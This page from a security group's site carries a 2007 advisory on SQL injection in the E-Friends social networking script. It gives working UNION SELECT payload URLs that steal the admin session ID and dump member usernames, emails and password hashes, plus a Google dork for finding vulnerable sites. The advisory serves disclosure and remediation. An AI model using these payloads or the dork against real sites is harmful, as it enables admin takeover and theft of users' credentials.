Home · Echo.or.id · Ezine · FAQ · Discussion Forum · Photo Gallery · Contact Us · Advisories · Event · Mailing List Thursday, November 23, 2017
Navigation
Home
Todays Events
Contact Us
Search
News Categories
Advisories
Hardware
Journal
Network
Echo News
Security
Software
Public Poll
Why did you wanna be a hacker?

they`re wearing a hat

its on my blood, dude

my mom told me too

knowledge its delicious

they type faster

no idea, who am i ?

Friendly Links
+ Aikmel.or.id
+ id-ubuntu
+ udaramaya.com
+ kecoak-elektronik
+ newhack.org
+ Opensource.id
+ Jasakom.com
+ Konsultan Linux
+ w[X]f project
+ klik-kanan.com
+ hyem.org
+ ilmuwebsite.com
+ y3dips blogs

Security Links
+ Phrack Magazine
+ The hacker`s choice
+ TESO team archive
+ Phenoelit
+ WarAxe
+ milw0rm
+ Insecure
+ Planet Web Security
+ Metasploit framework
+ Uninformed journal
+ Security tools
+ PacketStorm Security
+ Hack in the Box
+ DefCon
Users Online
Guests Online: 3
No Members Online

Registered Members: 7
Newest Member: K-159
Echo Badges
Echo.or.id

Echo.or.id
IRC Channel
Join our IRC channel at irc.dal.net/e-c-h-o
[ECHO_ADV_85$2007] alstrasoft E-Friends <= 4.98 (seid) Multiple Remote SQL Injection Vulnerabilities
AdvisoriesAuthor : M.Hasran Addahroni
Date : November, 15 th 2007
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv85-K-159-2007.txt
Critical Lvl : Critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : E-Friends
version : <= 4.98
Vendor : http://www.alstrasoft.com/efriends.htm
Description :

E-Friends is an online social networking script that allows you to start your own
profitable community just like Friendster and MySpace social networking site
plus the ability to offer paid membership subscriptions.
E-Friends allow members to connect to people in their personal networks
and make friends, match making, dating, blogging and join groups and events.
Features include email importer, messaging system, classifieds, join groups,
forums, affiliate program integrated, online chat, personal blog, calendar,
custom profile URL, friends search, invite friends, hotornot image ranking,
advance admin control panel, upload photos and many more.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Input passed to the "seid" parameter in events modules is not properly verified
before being used to sql query. This can be exploited thru the browser and get the hash
md5 password from members and retrieve admin session id.Successful exploitation requires
that "magic_quotes" is off.


Poc/Exploit:
~~~~~~~~~~
1.Retrieve Admin SessionID :

http://target.com/index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,
sess_id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin--

Use the SessionID in this URL:
http://target.com/admin.php?mode=users_manager&adsess=SESSION_ID

2.Get Members's Username and md5 hash:
http://target.org/index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,
concat(mem_id,0x3a,username,0x3a,email,0x3a,
password,0x3a,fname),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20members--



Dork:
~~~~~
Google : "JOIN OUR SITE Today. It's FREE!"


Solution:
~~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini


Timeline:
~~~~~~~~~

- 15 -11 - 2007 bug found
- 21 -11 - 2007 vendor contacted
- 22 -11 - 2007 publish advisory
---------------------------------------------------------------------------

Shoutz:
~~~~~
~ ping - my dearest wife, 'zizou' zautha - my lovely son, for all the luv, the tears n the breath
~ y3dips,the_day,m0by,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az001,negative,the_hydra,neng chika, str0ke
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry,ketut,x16
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
Staff Login
Username

Password



Top 10 News
idsecconf 2011 Palembang -- Call of paper 65535
Press Release IDSECCONF2010 65535
HITZ4 : "WIMAX, Are U Ready?" 65535
OPENBSD dibackdoor FBI sejak tahun 2000 65535
Hack In The Zoo - Online Class #1 65535
ECHO Gathering - Hack In The Zoo 5 - Bandung 65535
[Poltek Telkom] Student Creativity Contest 2011 - Open Mind IT Security Seminar 65535
SharePoint vulnerable terhadap POET Attacks, Microsoft Keluarkan Security Advisory 65535
[ECHO_ADV_113$2010] BSI Hotel Booking System Admin Login Bypass Vulnerability 65535
Selamat Hari Lahir ECHO yang ke-8 61423
Top 5 News Posters
y3dips 91
K-159 45
az001 20
echostaff 14
the_day 3
Event Calendar
November 2017
S M T W T F S
      1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30    
Echo T-Shirt
t-shirt
Echo Misc



Google
newbie_hacker
Visit this group

Add


Quotes
"Dreams are the touchstones of our character." (Henry David Thoreau)
Echo Book
y3dips
Copyleft !© echo.inc 2003-2012